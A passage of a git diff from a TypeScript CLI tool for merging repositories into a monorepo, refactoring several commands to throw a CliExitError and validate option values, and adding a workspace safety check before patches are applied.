(Prettier, ESLint, TypeScript) for a monorepo') + .argument('', 'Path to the monorepo directory') + .option('--apply', 'Apply changes to disk') + .option('--out ', 'Write plan JSON to file') + .option('-p, --packages-dir ', 'Packages subdirectory name', 'packages') + .option('-v, --verbose', 'Verbose output') + .action(configureCommand); +} diff --git a/src/commands/init.ts b/src/commands/init.ts index 7934143..5f3821f 100755 --- a/src/commands/init.ts +++ b/src/commands/init.ts @@ -2,6 +2,8 @@ import path from 'node:path'; import { execFileSync } from 'node:child_process'; import type { WorkspaceTool, PackageManagerConfig } from '../types/index.js'; import { createLogger } from '../utils/logger.js'; +import { CliExitError } from '../utils/errors.js'; +import { parseWorkspaceTool } from '../utils/cli-options.js'; import { ensureDir, writeFile, writeJson, pathExists } from '../utils/fs.js'; import { generateWorkspaceToolConfig, @@ -12,7 +14,7 @@ import { generateWorkspaceFiles, getWorkspacesConfig, getPackageManagerField, - parsePackageManagerType, + tryParsePackageManagerType, validatePackageManager, getPackageManagerDisplayName, getGitignoreEntries, @@ -250,19 +252,32 @@ export async function initCommand( const targetDir = directory ? path.resolve(directory) : process.cwd(); const name = path.basename(targetDir); const packagesDir = options.packagesDir || 'packages'; - const workspaceTool = (options.workspaceTool as WorkspaceTool) || 'none'; + const workspaceTool = parseWorkspaceTool(options.workspaceTool || 'none'); const initGit = options.git !== false; // Default to true const logger = createLogger(options.verbose); + if (!workspaceTool) { + logger.error( + `Invalid workspace tool: ${options.workspaceTool}. 
Valid options: turbo, nx, none` + ); + throw new CliExitError(); + } + // Determine package manager - const pmType = parsePackageManagerType(options.packageManager || 'pnpm'); + const pmType = tryParsePackageManagerType(options.packageManager || 'pnpm'); + if (!pmType) { + logger.error( + `Invalid package manager: ${options.packageManager}. Valid options: pnpm, yarn, yarn-berry, npm` + ); + throw new CliExitError(); + } // Validate package manager is installed const pmValidation = validatePackageManager(pmType); if (!pmValidation.valid) { logger.error(pmValidation.error!); - process.exit(1); + throw new CliExitError(); } const pmConfig = createPackageManagerConfig(pmType); @@ -274,7 +289,7 @@ export async function initCommand( if (await pathExists(packageJsonPath)) { logger.error(`Directory already contains a package.json: ${targetDir}`); logger.info('Use "monorepo merge" to combine existing repositories.'); - process.exit(1); + throw new CliExitError(); } logger.info(`Initializing monorepo in ${targetDir}...`); @@ -328,8 +343,9 @@ export async function initCommand( } else { logger.debug('Git repository already exists'); } - } catch { - logger.warn('Failed to initialize git repository'); + } catch (error) { + const message = error instanceof Error ? error.message : String(error); + logger.warn(`Failed to initialize git repository: ${message}`); } } @@ -352,6 +368,6 @@ export async function initCommand( } catch (error) { const message = error instanceof Error ? 
error.message : String(error); logger.error(`Init failed: ${message}`); - process.exit(1); + throw new CliExitError(); } } diff --git a/src/commands/merge.ts b/src/commands/merge.ts index fc04e1e..e724cb3 100755 --- a/src/commands/merge.ts +++ b/src/commands/merge.ts @@ -3,7 +3,6 @@ import { execFileSync } from 'node:child_process'; import chalk from 'chalk'; import type { MergeOptions, - ConflictStrategy, FileCollisionStrategy, WorkspaceTool, WorkflowMergeStrategy, @@ -11,6 +10,7 @@ import type { PackageManagerConfig, } from '../types/index.js'; import { createLogger, formatHeader, formatList } from '../utils/logger.js'; +import { CliExitError } from '../utils/errors.js'; import { createTempDir, removeDir, @@ -27,6 +27,11 @@ import { promptFileCollisionStrategy, promptConfirm, } from '../utils/prompts.js'; +import { + parseConflictStrategy, + parseWorkspaceTool, + parseWorkflowStrategy, +} from '../utils/cli-options.js'; import { analyzeDependencies } from '../analyzers/dependencies.js'; import { detectFileCollisions } from '../analyzers/files.js'; import { cloneOrCopyRepos } from '../strategies/copy.js'; @@ -45,6 +50,8 @@ import { } from '../strategies/workspace-tools.js'; import { preserveHistory, checkGitFilterRepo } from '../strategies/history-preserve.js'; import { mergeWorkflows } from '../strategies/workflow-merge.js'; +import { buildApplyPlan } from '../core/plan-builder.js'; +import { applyCommand } from './apply.js'; import { resolveDependencyConflicts, formatConflict, @@ -56,7 +63,7 @@ import { generateWorkspaceFiles, getWorkspacesConfig, getPackageManagerField, - parsePackageManagerType, + tryParsePackageManagerType, validatePackageManager, getPackageManagerDisplayName, } from '../strategies/package-manager.js'; @@ -156,6 +163,30 @@ function printDryRunReport( export async function mergeCommand(repos: string[], options: CLIOptions): Promise { const logger = createLogger(options.verbose); let tempDir: string | null = null; + const parsedConflictStrategy 
= parseConflictStrategy(options.conflictStrategy); + const parsedWorkspaceTool = parseWorkspaceTool(options.workspaceTool || 'none'); + const parsedWorkflowStrategy = parseWorkflowStrategy(options.workflowStrategy || 'combine'); + + if (!parsedConflictStrategy) { + logger.error( + `Invalid conflict strategy: ${options.conflictStrategy}. Valid options: highest, lowest, prompt` + ); + throw new CliExitError(); + } + + if (!parsedWorkspaceTool) { + logger.error( + `Invalid workspace tool: ${options.workspaceTool}. Valid options: turbo, nx, none` + ); + throw new CliExitError(); + } + + if (!parsedWorkflowStrategy) { + logger.error( + `Invalid workflow strategy: ${options.workflowStrategy}. Valid options: combine, keep-first, keep-last, skip` + ); + throw new CliExitError(); + } // Convert CLI options to MergeOptions (extended with Phase 2 options) const mergeOptions: MergeOptions & { @@ -167,15 +198,15 @@ export async function mergeCommand(repos: string[], options: CLIOptions): Promis packagesDir: options.packagesDir, dryRun: options.dryRun, yes: options.yes, - conflictStrategy: options.conflictStrategy as ConflictStrategy, + conflictStrategy: parsedConflictStrategy, verbose: options.verbose, install: options.install, noHoist: options.hoist === false, // Commander: --no-hoist sets hoist to false pinVersions: options.pinVersions, // Phase 2 options preserveHistory: options.preserveHistory, - workspaceTool: (options.workspaceTool as WorkspaceTool) || 'none', - workflowStrategy: (options.workflowStrategy as WorkflowMergeStrategy) || 'combine', + workspaceTool: parsedWorkspaceTool, + workflowStrategy: parsedWorkflowStrategy, }; // Robust cleanup function - doesn't throw on failure @@ -194,12 +225,19 @@ export async function mergeCommand(repos: string[], options: CLIOptions): Promis process.on('SIGINT', async () => { logger.warn('\nInterrupted. 
Cleaning up...'); await cleanup(); - process.exit(1); + process.exit(130); // 128 + SIGINT(2) }); try { // Step 0a: Determine package manager to use - let pmType: PackageManagerType = parsePackageManagerType(options.packageManager || 'pnpm'); + const parsedPm = tryParsePackageManagerType(options.packageManager || 'pnpm'); + if (!parsedPm) { + logger.error( + `Invalid package manager: ${options.packageManager}. Valid options: pnpm, yarn, yarn-berry, npm` + ); + throw new CliExitError(); + } + let pmType: PackageManagerType = parsedPm; // Step 0b: Check prerequisites for history preservation if (mergeOptions.preserveHistory) { @@ -210,6 +248,107 @@ export async function mergeCommand(repos: string[], options: CLIOptions): Promis } } + // Unified path: merge = build plan + apply (non-history mode). + if (!mergeOptions.preserveHistory) { + tempDir = await createTempDir('merge-plan-'); + const sourcesDir = path.join(tempDir, 'sources'); + + const built = await buildApplyPlan({ + repos, + outputDir: mergeOptions.output, + packagesDir: mergeOptions.packagesDir, + sourcesDir, + conflictStrategy: mergeOptions.conflictStrategy, + packageManager: pmType, + autoDetectPm: options.autoDetectPm, + workspaceTool: mergeOptions.workspaceTool || 'none', + workflowStrategy: mergeOptions.workflowStrategy || 'combine', + install: mergeOptions.install, + noHoist: mergeOptions.noHoist, + pinVersions: mergeOptions.pinVersions, + yes: mergeOptions.yes, + interactive: !mergeOptions.yes && !mergeOptions.dryRun, + verbose: mergeOptions.verbose, + logger, + promptConflictStrategy, + promptFileCollisionStrategy, + }); + + if (built.depAnalysis.conflicts.length > 0) { + const summary = getConflictSummary(built.depAnalysis.conflicts); + logger.warn( + `Found ${built.depAnalysis.conflicts.length} dependency conflicts ` + + `(${summary.incompatible} incompatible, ${summary.major} major, ${summary.minor} minor)` + ); + } else { + logger.success('No dependency conflicts detected'); + } + + if 
(built.collisions.length > 0) { + logger.warn(`Found ${built.collisions.length} file collisions`); + } else { + logger.success('No file collisions detected'); + } + + if (mergeOptions.dryRun) { + printDryRunReport( + built.repoPaths, + built.depAnalysis.conflicts, + built.collisions, + mergeOptions, + built.pmConfig + ); + await cleanup(); + return; + } + + if (await pathExists(mergeOptions.output)) { + if (!mergeOptions.yes) { + const overwrite = await promptConfirm( + `Output directory ${mergeOptions.output} already exists. Overwrite?`, + false + ); + if (!overwrite) { + logger.warn('Aborted by user'); + await cleanup(); + return; + } + } + await removeDir(mergeOptions.output); + } + await ensureDir(path.dirname(mergeOptions.output)); + + const transientPlanPath = path.join(tempDir, 'merge.apply-plan.json'); + await writeJson(transientPlanPath, built.plan, { spaces: 2 }); + await applyCommand({ + plan: transientPlanPath, + out: mergeOptions.output, + verbose: mergeOptions.verbose, + }); + + logger.log(''); + logger.success(chalk.bold('Monorepo created successfully!')); + logger.log(''); + logger.log(` ${chalk.cyan('Location:')} ${mergeOptions.output}`); + logger.log(` ${chalk.cyan('Packages:')} ${built.plan.sources.length}`); + logger.log( + ` ${chalk.cyan('Package manager:')} ${getPackageManagerDisplayName( + built.pmConfig.type + )}` + ); + logger.log(''); + logger.log('Next steps:'); + logger.log(` cd ${mergeOptions.output}`); + if (!mergeOptions.install) { + logger.log(` ${built.pmConfig.installCommand}`); + } + logger.log(` ${built.pmConfig.runAllCommand('build')}`); + + await cleanup(); + tempDir = null; + return; + } + // Step 1: Validate repo sources logger.info('Validating repository sources...'); const validation = await validateRepoSources(repos); @@ -218,7 +357,7 @@ export async function mergeCommand(repos: string[], options: CLIOptions): Promis for (const error of validation.errors) { logger.error(error); } - process.exit(1); + throw new 
CliExitError(); } logger.success(`Found ${validation.sources.length} repositories to merge`); @@ -232,6 +371,7 @@ export async function mergeCommand(repos: string[], options: CLIOptions): Promis const repoPaths = await cloneOrCopyRepos(validation.sources, tempDir, { logger, verbose: mergeOptions.verbose, + shallow: !mergeOptions.preserveHistory, // full clone needed for history preservation }); // Step 3b: Auto-detect package manager if requested @@ -250,7 +390,7 @@ export async function mergeCommand(repos: string[], options: CLIOptions): Promis if (!pmValidation.valid) { logger.error(pmValidation.error!); await cleanup(); - process.exit(1); + throw new CliExitError(); } // Create package manager config @@ -349,8 +489,9 @@ export async function mergeCommand(repos: string[], options: CLIOptions): Promis stdio: 'pipe', }); logger.debug('Initialized git repository in output directory'); - } catch { - // Git may already be initialized + } catch (error) { + const message = error instanceof Error ? 
error.message : String(error); + logger.debug(`git init skipped in output directory: ${message}`); } for (const repo of repoPaths) { @@ -526,9 +667,9 @@ resolution-mode=lowest const hasGitignoreCollision = collisions.some((c) => c.path === '.gitignore'); if (!hasGitignoreCollision) { // Check if any repo has a .gitignore and merge them all - const gitignorePaths = movedRepoPaths - .map((r) => path.join(r.path, '.gitignore')) - .filter(async (p) => await pathExists(p)); + const allGitignorePaths = movedRepoPaths.map((r) => path.join(r.path, '.gitignore')); + const gitignoreExists = await Promise.all(allGitignorePaths.map((p) => pathExists(p))); + const gitignorePaths = allGitignorePaths.filter((_, i) => gitignoreExists[i]); if (gitignorePaths.length > 0) { const merged = await mergeGitignores(gitignorePaths); @@ -604,6 +745,6 @@ dist/ } await cleanup(); - process.exit(1); + throw new CliExitError(); } } diff --git a/src/commands/migrate-branch.ts b/src/commands/migrate-branch.ts new file mode 100755 index 0000000..7bcb3ea --- /dev/null +++ b/src/commands/migrate-branch.ts @@ -0,0 +1,71 @@ +import path from 'node:path'; +import { createLogger } from '../utils/logger.js'; +import { writeJson } from '../utils/fs.js'; +import { generateBranchPlan, applyBranchPlan } from '../strategies/migrate-branch.js'; +import type { BranchMigrateStrategy } from '../types/index.js'; + +interface CLIMigrateBranchOptions { + from: string; + to: string; + strategy: string; + out?: string; + apply?: boolean; + verbose?: boolean; +} + +export async function migrateBranchCommand( + branch: string, + options: CLIMigrateBranchOptions, +): Promise { + const logger = createLogger(options.verbose); + const strategy = options.strategy as BranchMigrateStrategy; + + try { + logger.info(`Generating branch migration plan for '${branch}'...`); + logger.info(`Strategy: ${strategy} ${strategy === 'replay' ? 
'(experimental)' : '(recommended)'}`); + + const plan = await generateBranchPlan( + branch, + path.resolve(options.from), + path.resolve(options.to), + strategy, + logger, + ); + + // Write plan + const planPath = options.out || `branch-plan-${branch}.json`; + const absPath = path.resolve(planPath); + await writeJson(absPath, plan); + logger.success(`Branch plan written to ${absPath}`); + + // Print dry-run report + if (plan.dryRunReport) { + logger.info(`\nDry-Run Report:`); + logger.info(` Branch: ${plan.branch}`); + logger.info(` Commits: ${plan.dryRunReport.commitCount}`); + logger.info(` Estimated time: ${plan.dryRunReport.estimatedTime}`); + logger.info(` Contributors: ${plan.dryRunReport.contributors.join(', ') || 'none'}`); + } + + logger.info(`\nOperations (${plan.operations.length}):`); + for (const op of plan.operations) { + logger.info(` ${op.id}: ${op.description}`); + } + + // Apply if requested + if (options.apply) { + logger.info('\nApplying branch migration...'); + // Derive subdir from source repo name + const repoName = path.basename(plan.sourceRepo); + const subdir = `packages/${repoName}`; + await applyBranchPlan(plan, subdir, logger); + logger.success(`Branch '${branch}' migrated successfully`); + } else { + logger.info(`\nTo apply: monorepo migrate-branch ${branch} --from ${options.from} --to ${options.to} --strategy ${strategy} --apply`); + } + } catch (err: unknown) { + const msg = err instanceof Error ? 
err.message : String(err); + logger.error(`Branch migration failed: ${msg}`); + process.exitCode = 1; + } +} diff --git a/src/commands/plan.ts b/src/commands/plan.ts index e94ad64..16d9f84 100755 --- a/src/commands/plan.ts +++ b/src/commands/plan.ts @@ -2,63 +2,33 @@ import path from 'node:path'; import chalk from 'chalk'; import type { ConflictStrategy, - FileCollisionStrategy, + PackageManagerType, WorkspaceTool, WorkflowMergeStrategy, - PackageManagerType, - ApplyPlan, - PlanFile, } from '../types/index.js'; import { createLogger } from '../utils/logger.js'; +import { CliExitError } from '../utils/errors.js'; import { - createTempDir, removeDir, ensureDir, writeJson, - readJson, - pathExists, } from '../utils/fs.js'; -import { validateRepoSources } from '../utils/validation.js'; import { promptConflictStrategy, promptFileCollisionStrategy, } from '../utils/prompts.js'; -import { analyzeDependencies } from '../analyzers/dependencies.js'; -import { detectFileCollisions } from '../analyzers/files.js'; -import { cloneOrCopyRepos } from '../strategies/copy.js'; -import { - generateRootReadme, - mergeGitignores, - resolveFileCollisionToContent, -} from '../strategies/merge-files.js'; import { - generateWorkspaceConfig, -} from '../strategies/workspace-config.js'; + parseConflictStrategy, + parseWorkspaceTool, + parseWorkflowStrategy, +} from '../utils/cli-options.js'; +import { getConflictSummary } from '../resolvers/dependencies.js'; import { - generateWorkspaceToolConfig, - getWorkspaceToolDependencies, - updateScriptsForWorkspaceTool, -} from '../strategies/workspace-tools.js'; -import { mergeWorkflowsToFiles } from '../strategies/workflow-merge.js'; -import { - resolveDependencyConflicts, - getConflictSummary, -} from '../resolvers/dependencies.js'; -import { - createPackageManagerConfig, - detectPackageManagerFromSources, - generateWorkspaceFiles, - getWorkspacesConfig, - getGitignoreEntries, - getPackageManagerField, - parsePackageManagerType, - 
validatePackageManager, getPackageManagerDisplayName, + tryParsePackageManagerType, } from '../strategies/package-manager.js'; +import { buildApplyPlan } from '../core/plan-builder.js'; -/** - * CLI options passed from commander - */ interface CLIPlanOptions { output: string; packagesDir: string; @@ -75,339 +45,122 @@ interface CLIPlanOptions { workflowStrategy?: string; } -/** - * Main plan command handler. - * Mirrors the merge command flow but serializes an ApplyPlan instead of writing to disk. - */ export async function planCommand(repos: string[], options: CLIPlanOptions): Promise { const logger = createLogger(options.verbose); - let tempDir: string | null = null; const outputDir = path.resolve(options.output); const packagesDir = options.packagesDir; - const workspaceTool = (options.workspaceTool as WorkspaceTool) || 'none'; - const workflowStrategy = (options.workflowStrategy as WorkflowMergeStrategy) || 'combine'; - const noHoist = options.hoist === false; const yes = options.yes ?? false; + const noHoist = options.hoist === false; + + const workspaceTool = parseWorkspaceTool(options.workspaceTool || 'none'); + const workflowStrategy = parseWorkflowStrategy(options.workflowStrategy || 'combine'); + const parsedConflictStrategy = parseConflictStrategy(options.conflictStrategy); + const parsedPm = tryParsePackageManagerType(options.packageManager || 'pnpm'); + + if (!workspaceTool) { + logger.error( + `Invalid workspace tool: ${options.workspaceTool}. Valid options: turbo, nx, none` + ); + throw new CliExitError(); + } + + if (!workflowStrategy) { + logger.error( + `Invalid workflow strategy: ${options.workflowStrategy}. Valid options: combine, keep-first, keep-last, skip` + ); + throw new CliExitError(); + } + + if (!parsedConflictStrategy) { + logger.error( + `Invalid conflict strategy: ${options.conflictStrategy}. 
Valid options: highest, lowest, prompt` + ); + throw new CliExitError(); + } + + if (!parsedPm) { + logger.error( + `Invalid package manager: ${options.packageManager}. Valid options: pnpm, yarn, yarn-berry, npm` + ); + throw new CliExitError(); + } - // Determine plan file path const planFilePath = options.planFile ? path.resolve(options.planFile) : path.resolve(`${path.basename(outputDir)}.plan.json`); - - // Sources directory: co-located with plan file const sourcesDir = `${planFilePath}.sources`; - // Robust cleanup function - const cleanup = async () => { - if (tempDir) { - try { - logger.debug(`Cleaning up temp directory: ${tempDir}`); - await removeDir(tempDir); - } catch (error) { - logger.warn(`Failed to cleanup temp directory: ${error instanceof Error ? error.message : String(error)}`); - } + const cleanupSources = async () => { + try { + await removeDir(sourcesDir); + } catch (error) { + const message = error instanceof Error ? error.message : String(error); + logger.debug(`Failed to clean plan sources directory ${sourcesDir}: ${message}`); } }; - process.on('SIGINT', async () => { + const onSigint = async () => { logger.warn('\nInterrupted. 
Cleaning up...'); - await cleanup(); - process.exit(1); - }); + await cleanupSources(); + process.exit(130); + }; + process.on('SIGINT', onSigint); try { - // Step 1: Determine package manager - let pmType: PackageManagerType = parsePackageManagerType(options.packageManager || 'pnpm'); - - // Step 2: Validate repo sources - logger.info('Validating repository sources...'); - const validation = await validateRepoSources(repos); - - if (!validation.valid) { - for (const error of validation.errors) { - logger.error(error); - } - process.exit(1); - } - - logger.success(`Found ${validation.sources.length} repositories to merge`); - - // Step 3: Clone/copy repos into the persistent sources directory await ensureDir(sourcesDir); - logger.info('Fetching repositories...'); - const repoPaths = await cloneOrCopyRepos(validation.sources, sourcesDir, { - logger, + + const result = await buildApplyPlan({ + repos, + outputDir, + packagesDir, + sourcesDir, + conflictStrategy: parsedConflictStrategy, + packageManager: parsedPm, + autoDetectPm: options.autoDetectPm, + workspaceTool, + workflowStrategy, + install: options.install, + noHoist, + pinVersions: options.pinVersions, + yes, + interactive: !yes, verbose: options.verbose, + logger, + promptConflictStrategy, + promptFileCollisionStrategy, }); - // Step 4: Auto-detect package manager if requested - if (options.autoDetectPm) { - const detected = await detectPackageManagerFromSources(repoPaths); - if (detected) { - pmType = detected; - logger.info(`Auto-detected package manager: ${getPackageManagerDisplayName(pmType)}`); - } else { - logger.debug('No package manager detected from sources, using default'); - } - } - - // Step 5: Validate package manager is installed - const pmValidation = validatePackageManager(pmType); - if (!pmValidation.valid) { - logger.error(pmValidation.error!); - process.exit(1); - } - - const pmConfig = createPackageManagerConfig(pmType); - logger.debug(`Using package manager: 
${getPackageManagerDisplayName(pmType)} v${pmConfig.version}`); - - // Step 6: Analyze dependencies - logger.info('Analyzing dependencies...'); - const depAnalysis = await analyzeDependencies(repoPaths); - - if (depAnalysis.conflicts.length > 0) { - const summary = getConflictSummary(depAnalysis.conflicts); + if (result.depAnalysis.conflicts.length > 0) { + const summary = getConflictSummary(result.depAnalysis.conflicts); logger.warn( - `Found ${depAnalysis.conflicts.length} dependency conflicts ` + - `(${summary.incompatible} incompatible, ${summary.major} major, ${summary.minor} minor)` + `Found ${result.depAnalysis.conflicts.length} dependency conflicts ` + + `(${summary.incompatible} incompatible, ${summary.major} major, ${summary.minor} minor)` ); } else { logger.success('No dependency conflicts detected'); } - // Step 7: Detect file collisions - logger.info('Detecting file collisions...'); - const collisions = await detectFileCollisions(repoPaths); - - if (collisions.length > 0) { - logger.warn(`Found ${collisions.length} file collisions`); + if (result.collisions.length > 0) { + logger.warn(`Found ${result.collisions.length} file collisions`); } else { logger.success('No file collisions detected'); } - // Step 8: Resolve dependency conflicts - let conflictStrategy = options.conflictStrategy as ConflictStrategy; - - if (depAnalysis.conflicts.length > 0 && conflictStrategy === 'prompt' && !yes) { - conflictStrategy = await promptConflictStrategy(); - } else if (yes && conflictStrategy === 'prompt') { - conflictStrategy = 'highest'; - } - - const resolvedDeps = await resolveDependencyConflicts( - depAnalysis.conflicts, - conflictStrategy, - depAnalysis.resolvedDependencies, - depAnalysis.resolvedDevDependencies - ); - - // Step 9: Resolve file collision strategies - const fileStrategies = new Map(); - - for (const collision of collisions) { - let strategy = collision.suggestedStrategy as FileCollisionStrategy; - - if (!yes && collision.suggestedStrategy !== 
'skip') { - strategy = await promptFileCollisionStrategy(collision); - } - - fileStrategies.set(collision.path, strategy); - } - - // Step 10: Generate workspace config - const workspaceConfig = generateWorkspaceConfig(depAnalysis.packages, { - rootName: path.basename(outputDir), - packagesDir, - dependencies: noHoist ? {} : resolvedDeps.dependencies, - devDependencies: noHoist ? {} : resolvedDeps.devDependencies, - pmConfig, - }); - - if (noHoist) { - logger.debug('Using --no-hoist: dependencies stay in each package'); - } - - // Step 10b: Update scripts for workspace tool - if (workspaceTool !== 'none') { - const availableScripts = Object.keys(workspaceConfig.rootPackageJson.scripts as Record || {}); - const updatedScripts = updateScriptsForWorkspaceTool( - workspaceConfig.rootPackageJson.scripts as Record, - workspaceTool, - availableScripts - ); - workspaceConfig.rootPackageJson.scripts = updatedScripts; - - const toolDeps = getWorkspaceToolDependencies(workspaceTool); - const existingDevDeps = (workspaceConfig.rootPackageJson.devDependencies as Record) || {}; - workspaceConfig.rootPackageJson.devDependencies = { ...existingDevDeps, ...toolDeps }; - logger.debug(`Configured for ${workspaceTool} workspace tool`); - } - - // Add workspaces field for yarn/npm - const workspacesConfig = getWorkspacesConfig(pmConfig, packagesDir); - if (workspacesConfig) { - workspaceConfig.rootPackageJson.workspaces = workspacesConfig; - } - - // Set packageManager field - workspaceConfig.rootPackageJson.packageManager = getPackageManagerField(pmConfig); - - // Collect all plan files - const planFiles: PlanFile[] = []; - - // Step 11: Workspace files (pnpm-workspace.yaml for pnpm) - const workspaceFilesList = generateWorkspaceFiles(pmConfig, packagesDir); - for (const file of workspaceFilesList) { - planFiles.push({ relativePath: file.filename, content: file.content }); - } - - // Step 12: Workspace tool config (turbo.json / nx.json) - if (workspaceTool !== 'none') { - const 
toolConfig = generateWorkspaceToolConfig(depAnalysis.packages, workspaceTool); - if (toolConfig) { - planFiles.push({ relativePath: toolConfig.filename, content: toolConfig.content }); - } - } - - // Step 13: Merge workflows - if (workflowStrategy !== 'skip') { - logger.info('Processing CI/CD workflows...'); - try { - const workflowFiles = await mergeWorkflowsToFiles(repoPaths, workflowStrategy); - planFiles.push(...workflowFiles.map(f => ({ relativePath: f.relativePath, content: f.content }))); - if (workflowFiles.length > 0) { - logger.debug(`Prepared ${workflowFiles.length} workflow file(s)`); - } - } catch (error) { - logger.warn(`Failed to process workflows: ${error instanceof Error ? error.message : String(error)}`); - } - } - - // Step 14: Handle file collisions - for (const collision of collisions) { - const strategy = fileStrategies.get(collision.path) || collision.suggestedStrategy as FileCollisionStrategy; - const collisionFiles = await resolveFileCollisionToContent(collision, strategy, repoPaths); - planFiles.push(...collisionFiles.map(f => ({ relativePath: f.relativePath, content: f.content }))); - } - - // Step 15: Generate .gitignore - const hasGitignoreCollision = collisions.some((c) => c.path === '.gitignore'); - if (!hasGitignoreCollision) { - const gitignorePaths: string[] = []; - for (const r of repoPaths) { - const p = path.join(r.path, '.gitignore'); - if (await pathExists(p)) { - gitignorePaths.push(p); - } - } - - let gitignoreContent: string; - if (gitignorePaths.length > 0) { - gitignoreContent = await mergeGitignores(gitignorePaths); - } else { - gitignoreContent = `node_modules/\ndist/\n.DS_Store\n*.log\n`; - } - - // Append PM-specific entries - const pmEntries = getGitignoreEntries(pmConfig); - if (pmEntries.length > 0) { - gitignoreContent += '\n# Package manager\n' + pmEntries.join('\n') + '\n'; - } - - planFiles.push({ relativePath: '.gitignore', content: gitignoreContent }); - } - - // Step 16: Generate README - const readmeContent 
= generateRootReadme( - repoPaths.map((r) => r.name), - packagesDir, - pmConfig - ); - planFiles.push({ relativePath: 'README.md', content: readmeContent }); - - // Step 17: Generate .npmrc if --no-hoist - if (noHoist) { - const npmrcContent = `# Prevent dependency hoisting - each package manages its own dependencies -# This helps avoid type conflicts between packages with different version requirements -shamefully-hoist=false -hoist=false - -# Use lowest satisfying versions to avoid breaking changes in newer releases -resolution-mode=lowest -`; - planFiles.push({ relativePath: '.npmrc', content: npmrcContent }); - } - - // Step 18: Pin versions in source package.jsons if requested - if (options.pinVersions) { - logger.debug('Pinning dependency versions (removing ^ and ~ ranges)'); - for (const repo of repoPaths) { - const pkgJsonPath = path.join(repo.path, 'package.json'); - if (await pathExists(pkgJsonPath)) { - try { - const pkgJson = await readJson>(pkgJsonPath); - let modified = false; - - const pinDeps = (deps: Record | undefined): Record | undefined => { - if (!deps) return deps; - const pinned: Record = {}; - for (const [name, version] of Object.entries(deps)) { - if (version.startsWith('^') || version.startsWith('~')) { - pinned[name] = version.slice(1); - modified = true; - } else { - pinned[name] = version; - } - } - return pinned; - }; - - pkgJson.dependencies = pinDeps(pkgJson.dependencies as Record); - pkgJson.devDependencies = pinDeps(pkgJson.devDependencies as Record); - pkgJson.peerDependencies = pinDeps(pkgJson.peerDependencies as Record); - - if (modified) { - await writeJson(pkgJsonPath, pkgJson, { spaces: 2 }); - logger.debug(`Pinned versions in ${repo.name}/package.json`); - } - } catch (error) { - logger.warn(`Failed to pin versions in ${repo.name}: ${error instanceof Error ? 
error.message : String(error)}`); - } - } - } - } - - // Step 19: Assemble the ApplyPlan - const plan: ApplyPlan = { - version: 1, - sources: repoPaths.map((r) => ({ name: r.name, path: r.path })), - packagesDir, - rootPackageJson: workspaceConfig.rootPackageJson, - files: planFiles, - install: options.install, - installCommand: pmConfig.installCommand, - analysisFindings: depAnalysis.findings, - }; - - // Step 20: Write plan file await ensureDir(path.dirname(planFilePath)); - await writeJson(planFilePath, plan, { spaces: 2 }); + await writeJson(planFilePath, result.plan, { spaces: 2 }); - // Step 21: Print summary logger.log(''); logger.success(chalk.bold('Plan generated successfully!')); logger.log(''); logger.log(` ${chalk.cyan('Plan file:')} ${planFilePath}`); logger.log(` ${chalk.cyan('Sources:')} ${sourcesDir}`); - logger.log(` ${chalk.cyan('Packages:')} ${repoPaths.length}`); - logger.log(` ${chalk.cyan('Package manager:')} ${getPackageManagerDisplayName(pmType)}`); - logger.log(` ${chalk.cyan('Extra files:')} ${planFiles.length}`); + logger.log(` ${chalk.cyan('Packages:')} ${result.repoPaths.length}`); + logger.log(` ${chalk.cyan('Package manager:')} ${getPackageManagerDisplayName(result.pmType)}`); + logger.log(` ${chalk.cyan('Extra files:')} ${result.plan.files.length}`); - if (depAnalysis.conflicts.length > 0) { - logger.log( - ` ${chalk.cyan('Resolved conflicts:')} ${depAnalysis.conflicts.length}` - ); + if (result.depAnalysis.conflicts.length > 0) { + logger.log(` ${chalk.cyan('Resolved conflicts:')} ${result.depAnalysis.conflicts.length}`); } logger.log(''); @@ -421,12 +174,23 @@ resolution-mode=lowest } catch (error) { const message = error instanceof Error ? 
error.message : String(error); logger.error(`Plan failed: ${message}`); - if (options.verbose && error instanceof Error && error.stack) { logger.debug(error.stack); } - - await cleanup(); - process.exit(1); + await cleanupSources(); + throw new CliExitError(); + } finally { + process.removeListener('SIGINT', onSigint); } } + +export type PlanCommandDeps = { + _unused?: never; +}; + +export type PlanCommandOptions = { + conflictStrategy: ConflictStrategy; + workspaceTool: WorkspaceTool; + workflowStrategy: WorkflowMergeStrategy; + packageManager: PackageManagerType; +}; diff --git a/src/commands/prepare.ts b/src/commands/prepare.ts index a95a18f..531952c 100755 --- a/src/commands/prepare.ts +++ b/src/commands/prepare.ts @@ -2,6 +2,7 @@ import path from 'node:path'; import { execFileSync } from 'node:child_process'; import chalk from 'chalk'; import { createLogger, formatHeader } from '../utils/logger.js'; +import { CliExitError } from '../utils/errors.js'; import { createTempDir, removeDir, @@ -24,7 +25,9 @@ interface CLIPrepareOptions { patchOnly?: boolean; outDir?: string; prepWorkspace?: string; + out?: string; verbose?: boolean; + json?: boolean; } /** @@ -38,7 +41,7 @@ export async function prepareCommand(repos: string[], options: CLIPrepareOptions // Validate mutually exclusive flags if (options.patchOnly && options.prepWorkspace) { logger.error('--patch-only and --prep-workspace are mutually exclusive'); - process.exit(1); + throw new CliExitError(); } // Robust cleanup function @@ -56,7 +59,7 @@ export async function prepareCommand(repos: string[], options: CLIPrepareOptions process.on('SIGINT', async () => { logger.warn('\nInterrupted. 
Cleaning up...'); await cleanup(); - process.exit(1); + process.exit(130); // 128 + SIGINT(2) }); try { @@ -68,7 +71,7 @@ export async function prepareCommand(repos: string[], options: CLIPrepareOptions for (const error of validation.errors) { logger.error(error); } - process.exit(1); + throw new CliExitError(); } logger.success(`Found ${validation.sources.length} repositories to prepare`); @@ -116,6 +119,15 @@ export async function prepareCommand(repos: string[], options: CLIPrepareOptions // --prep-workspace mode: apply patches, commit on branch const workspaceDir = path.resolve(options.prepWorkspace); const branchName = 'prepare/monotize'; + const successfullyAppliedPatches: string[] = []; + + // Safety check: only apply patches to repos cloned/copied inside the prep workspace. + for (const repo of repoPaths) { + const rel = path.relative(workspaceDir, repo.path); + if (rel.startsWith('..') || path.isAbsolute(rel)) { + throw new Error(`Safety check failed: refusing to modify repo outside workspace (${repo.path})`); + } + } for (const repo of repoPaths) { // Initialize git if needed (local copies may not have .git) @@ -132,30 +144,51 @@ export async function prepareCommand(repos: string[], options: CLIPrepareOptions // Apply patches for this repo const repoPatches = analysis.patches.filter((p) => p.repoName === repo.name); + const applied: string[] = []; + const failed: string[] = []; for (const patch of repoPatches) { const patchPath = path.join(repo.path, '__temp_patch.diff'); await writeFile(patchPath, patch.content); try { execFileSync('git', ['apply', patchPath], { 